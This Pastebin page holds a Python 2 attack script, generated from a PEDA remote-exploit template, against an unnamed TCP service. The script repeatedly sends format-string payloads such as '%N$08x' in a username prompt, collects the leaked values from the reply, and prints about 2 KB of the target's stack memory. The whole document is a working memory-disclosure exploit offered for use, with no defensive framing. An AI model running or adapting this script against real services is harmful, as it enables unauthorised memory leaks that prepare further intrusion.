Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # Template for remote TCP exploit code, generated by PEDA
- #
- import os
- import sys
- import struct
- import resource
- import time
- import re
- def usage():
- print "Usage: %s host port" % sys.argv[0]
- return
- from socket import *
- import telnetlib
- class TCPClient():
- def __init__(self, host, port, debug=0):
- self.debug = debug
- self.sock = socket(AF_INET, SOCK_STREAM)
- self.sock.connect((host, port))
- def debug_log(self, size, data, cmd):
- if self.debug != 0:
- print "%s(%d): %s" % (cmd, size, repr(data))
- def send(self, data, delay=0):
- if delay:
- time.sleep(delay)
- nsend = self.sock.send(data)
- if self.debug > 1:
- self.debug_log(nsend, data, "send")
- return nsend
- def sendline(self, data, delay=0):
- nsend = self.send(data + "\n", delay)
- return nsend
- def recv(self, size=1024, delay=0):
- if delay:
- time.sleep(delay)
- buf = self.sock.recv(size)
- if self.debug > 0:
- self.debug_log(len(buf), buf, "recv")
- return buf
- def recv_until(self, delim):
- buf = ""
- while True:
- c = self.sock.recv(1)
- buf += c
- if delim in buf:
- break
- self.debug_log(len(buf), buf, "recv")
- return buf
- def recvline(self):
- buf = self.recv_until("\n")
- return buf
- def close(self):
- self.sock.close()
- def exploit(host, port):
- index = 0
- done = False
- stack = []
- try:
- # connect
- port = int(port)
- client = TCPClient(host, port, debug=0)
- print '[+] Stack dumper started'
- # 512 eq. 2048(512 * 4) bytes from stack
- while index != 512:
- # recieve username banner and send a crafted formatstring response
- client.recv(1024)
- index += 1
- fsr = "%{0}$08x".format(str(index))
- client.send(fsr + '\n')
- # recieve password banner and send a empty response
- client.recv(1024)
- client.send('\n')
- # recieve email banner and send a empty response
- client.recv(1024)
- client.send('\n')
- # recieve the result message and extract the formatstring response
- # from the username entry
- l = re.findall(r"'(.*?)'", client.recv(1024))
- stack.append( l[0] )
- # recieve the retry message and response
- client.recv(1024)
- client.send('yes\n')
- # some insurence
- client.close()
- for i in range(len(stack) / 4):
- print '%08d:'%((i * 4)+1), stack[(i*4)], stack[(i*4)+1], stack[(i*4)+2],stack[(i*4)+3]
- print '[-] Stack dumper finished'
- except Exception:
- # some insurence
- client.close()
- exit()
- if __name__ == "__main__":
- if len(sys.argv) < 3:
- usage()
- else:
- exploit(sys.argv[1], sys.argv[2])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement